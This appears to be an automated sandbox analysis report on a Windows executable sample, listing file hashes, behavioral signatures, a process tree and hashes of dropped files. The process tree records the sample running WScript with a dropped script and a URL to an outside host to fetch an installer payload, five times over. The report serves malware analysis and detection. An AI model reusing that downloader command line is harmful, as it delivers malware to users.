Analysis
-
max time kernel
122s -
max time network
128s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
27/04/2024, 01:55
Static task
static1
Behavioral task
behavioral1
Sample
02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe
Resource
win10v2004-20240419-en
General
-
Target
02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe
-
Size
184KB
-
MD5
02269b000b66f0a2b3e37f916c16db61
-
SHA1
4cea131d8373fd3ba795141d4c8f30cbc88a05e1
-
SHA256
0af367a6c2d315a0c5f268e413c473f795a7c812636c9f32e3d51a755a72f4b4
-
SHA512
c0d5e438617ad06a3b7a563f58d8e19fd71baf8fe443d55af9cb51fd012f5b82aa80c9b8625f737ffce558530e96304dfb5b2317ff32337757c573af505d848d
-
SSDEEP
3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO39:/7BSH8zUB+nGESaaRvoB7FJNndnY
Malware Config
Signatures
-
Blocklisted process makes network request 11 IoCs
flow pid Process 6 2724 WScript.exe 8 2724 WScript.exe 10 2724 WScript.exe 12 2456 WScript.exe 13 2456 WScript.exe 15 1076 WScript.exe 16 1076 WScript.exe 18 2012 WScript.exe 19 2012 WScript.exe 21 1672 WScript.exe 22 1672 WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 1304 2216 WerFault.exe 27 -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 2216 wrote to memory of 2724 2216 02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe 28 PID 2216 wrote to memory of 2724 2216 02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe 28 PID 2216 wrote to memory of 2724 2216 02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe 28 PID 2216 wrote to memory of 2724 2216 02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe 28 PID 2216 wrote to memory of 2456 2216 02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe 30 PID 2216 wrote to memory of 2456 2216 02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe 30 PID 2216 wrote to memory of 2456 2216 02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe 30 PID 2216 wrote to memory of 2456 2216 02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe 30 PID 2216 wrote to memory of 1076 2216 02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe 32 PID 2216 wrote to memory of 1076 2216 02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe 32 PID 2216 wrote to memory of 1076 2216 02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe 32 PID 2216 wrote to memory of 1076 2216 02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe 32 PID 2216 wrote to memory of 2012 2216 02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe 34 PID 2216 wrote to memory of 2012 2216 02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe 34 PID 2216 wrote to memory of 2012 2216 02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe 34 PID 2216 wrote to memory of 2012 2216 02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe 34 PID 2216 wrote to memory of 1672 2216 02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe 36 PID 2216 wrote to memory of 1672 2216 02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe 36 PID 2216 wrote to memory of 1672 2216 02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe 36 PID 2216 wrote to memory of 1672 2216 02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe 36 PID 2216 wrote to memory of 1304 2216 02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe 40 PID 2216 wrote to memory of 1304 2216 02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe 40 PID 2216 wrote to memory of 1304 2216 02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe 40 PID 2216 wrote to memory of 1304 2216 02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf6A09.js" http://www.djapp.info/?domain=lcEIgrFHWM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf6A09.exe2⤵
- Blocklisted process makes network request
PID:2724
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf6A09.js" http://www.djapp.info/?domain=lcEIgrFHWM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf6A09.exe2⤵
- Blocklisted process makes network request
PID:2456
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf6A09.js" http://www.djapp.info/?domain=lcEIgrFHWM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf6A09.exe2⤵
- Blocklisted process makes network request
PID:1076
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf6A09.js" http://www.djapp.info/?domain=lcEIgrFHWM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf6A09.exe2⤵
- Blocklisted process makes network request
PID:2012
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf6A09.js" http://www.djapp.info/?domain=lcEIgrFHWM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf6A09.exe2⤵
- Blocklisted process makes network request
PID:1672
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 4722⤵
- Program crash
PID:1304
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize1KB
MD51faa26ae52cac819bc42e2ee6f6ef61f
SHA14a06963e3a50439e0a23dd8977e7856a1c3ae579
SHA256bdf3acc2946bbc6cd65df5af28acb5f5155d13fe2d2f889a479c2039413c2c3b
SHA512fb7551568671c946a3882b9435955624b01fc14fccf80c3d2554582d478aa613d9ec07b86e7f2b4f250933d5eb805bdf3c57239bc26ff854e3f243381e33a04c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize724B
MD58202a1cd02e7d69597995cabbe881a12
SHA18858d9d934b7aa9330ee73de6c476acf19929ff6
SHA25658f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA51297ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize410B
MD53f8e0e519bdf8824165285c45007dd56
SHA15bb94cf84ed7eade78ec68b4dd2d65d5fa43360d
SHA2561f6d78d69b28eae5765137a5e93b3eecdc5536bcd1b56d4f6494ed520ebc952a
SHA512b7ec2bc5407d867355aa9eab536df24882156f0f1b122959c1669f49a86c842c5d8b072f035d6d378a37cf11c644cd6b8ea7b99a38cadce6055ed078823031c4
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD576bc9c4a089ab90a1d4c06de527c3bc7
SHA12cdcfb29303752d22db2c195c621909cfa45dc21
SHA2566c9ac89fb5a07743fd22616db83148bd38cd8c6abc6ae4689effeba44c8f1b30
SHA5122ca5784c2adf741f40ce663ea12090cf9d5472e638990768743cf42b54538bd52b03df6f079e6201679e2bb4b0ae15091caa87e6ddcacdd31f80ecaece3c5e48
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize392B
MD5571e2ffb85e355e8364079a177c85aff
SHA16205503272b3fa1908210094d5f6097bed739dd3
SHA256d103e66cc71b81479443e3e746a50b3f86776e2706ab08249255cfe08b2b078e
SHA51264c5658fa3eafe0ee5caf4fd491683c5be9d1eb1f78f2016ad8dece631417794a43df7c195873a103377dfb5b9ccb7ba0850a785b200fa6d61bd6798486f6bfd
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5DKX8QD5\domain_profile[1].htm
Filesize6KB
MD579e919bed4f1b2f0cba8d1b4b3692c6e
SHA1fa2566714e24352780299bbe5f7875285b40ab89
SHA256d18a5fd6ba03d4cfb07ff17db1483efe282a83faafbdd6a30c4114de74d48793
SHA51217224e8a5274a2021ff2de525f9a2503d3d752f78b9b51cdaa11c54f2527cb60d625c5cf92183de998083bf4f5b80786fe5b8842ae8d6c2ca7376e0b818701b4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5DKX8QD5\domain_profile[1].htm
Filesize6KB
MD580f251b96823c7b68922642c7f3d6207
SHA14df6762b5aad25a72ae851a364cec92434c3b560
SHA2563f8702565255190f814e3ccbd812c205131a1ef280b74779ae4f4b40232a459e
SHA51279fd3d54d27e179ebc1a9b5fb8e45c7124e458e2977430fd326c110921226bc1ed9bf3cf600d8fa5b1e30b84a388a98838e14a3b59f1a77447325e755904170e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\domain_profile[1].htm
Filesize6KB
MD5fe76f9c23cb8154464ff015b63671488
SHA1c78528298af122b424993911f992a59c4e48584d
SHA2568cd4480c928fb9fce744e044536e3dba16d3542ed8ebec44e7964df2595c1d0e
SHA512da3370f208f92ff177e590daef1f8c9cec0b351ab3f31556120db8d16c605c00fe9b1c4ec13297f7722887a301c0908ef7d6d0b5e8423d88be7d0af162a7449a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\domain_profile[1].htm
Filesize6KB
MD50f5eeaa1c2280eb9f00e840cc0342a10
SHA178a4a1ef8cee8cc2a85a98ebb785f25383f98f82
SHA256dd84fc9d54446f6efa26e034cac2cd65b7a0e58e6df66780c1a1a9a3da640ab0
SHA512e57ef0f83104263f46dbb623f2ca1e1aea36cbac0d3272f7b7322973bc4271531257328a93e570698893bb4f475cafdc841854cccaf68e9bd6780feada6d1529
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\domain_profile[1].htm
Filesize6KB
MD5dbfd4a6a4054c8403232455e4dcd250e
SHA16cfc38140dbd6a76636f6639fd7e657787537bc2
SHA2565ed6ab46850d2182a369319c8e571e0349ddd851e3d3d4fdb1586f66ac173200
SHA51264b4784c01bd1bc974a810ba3239a3906791c4ec3997bf31d8a72709d99c5ff15e3f53339eef3bfa5341753ee20eaca73475d3ac646bd0b65006b8b5f6a22472
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
171KB
MD59c0c641c06238516f27941aa1166d427
SHA164cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA2564276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06
-
Filesize
3KB
MD53813cab188d1de6f92f8b82c2059991b
SHA14807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb
SHA256a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e
SHA51283b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76
-
Filesize
177B
MD569e29209f990511922b4eb4d9545f0b4
SHA19a41c52daf811e8868def2728eb2ac7f86c6d589
SHA2563901421aea7d5a8beb6a8d2e1efd4e628b39624f0441834428d421079c34cbdd
SHA512feea3f118f72625661a3621e4da5be611a24f9f1bfe34377016296d1b7fe77722802701c27e182d1199ed157882e324bad57375bbc759aba7a3489c8e7a6c78f